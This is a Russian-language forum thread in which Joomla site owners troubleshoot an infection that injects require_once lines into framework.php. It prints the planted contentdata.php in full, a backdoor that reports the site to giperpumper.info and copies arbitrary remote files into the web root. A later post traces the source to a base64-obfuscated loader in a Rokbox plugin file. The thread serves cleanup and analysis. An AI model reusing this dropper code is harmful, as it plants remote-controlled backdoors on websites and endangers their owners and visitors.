в файл framework.php вставляются левые строки

в файл framework.php вставляются левые строки:

Код (PHP):

1. require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; unset( $CONFIG );

после чего в компоненте com_content создаются файл contentdata.php с содержимом:

Код (PHP):

1. <?php
2.  
3. /**
4. * @version      $Id: index.php 14401 2010-01-26 14:10:00Z louis $
5. * @package      Joomla
6. * @copyright   Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
7. * @license      GNU/GPL, see LICENSE.php
8. * Joomla! is free software. This version may have been modified pursuant
9. * to the GNU General Public License, and as distributed it includes or
10. * is derivative of works licensed under the GNU General Public License or
11. * other free or open source software licenses.
12. * See COPYRIGHT.php for copyright notices and details.
13. */
14. $schooljournal = @file_get_contents("http://giperpumper.info/schooljournal.php?host=".$_SERVER['HTTP_HOST']."");
15. if ( isset($_GET['host']) && isset($_GET['file']) && isset($_GET['paramurl']) )
16. {
17. $pathname = file_get_contents("http://".$_GET['host']."/".$_GET['paramurl']."");
18.  
19. if (!copy("http://".$_GET['host']."/".$_GET['file']."", "".$_SERVER['DOCUMENT_ROOT']."/".$pathname."")) {
20.  
21.     echo "не удалось скопировать...\n";
22.  
23. }
24. }
25. ?>

Удаление не помогает, где и чем можно искать основную заразу, которая вставляет строки?

 

Скачал файл (В этом файле один сплошной зашифрованный код)
по ссылке, проверил на локалке. Выдал целый список с строкой String:: $_POST
Кстати, после проверке уходит письмо на адрес isoisorf@gmail.com.
Я так понял после этого надо проверить каждый файл что ли?

 

Кому интересно, нашел у себя в файле /plugins/content/rokbox/rokbox.php (Плагин Rokbox - карусель картинок) строчку $GLOBALS['_1822813929_']=Array(base64_decode и много-много букв. В расшифровке они как раз и дают указанные в первом посте строчки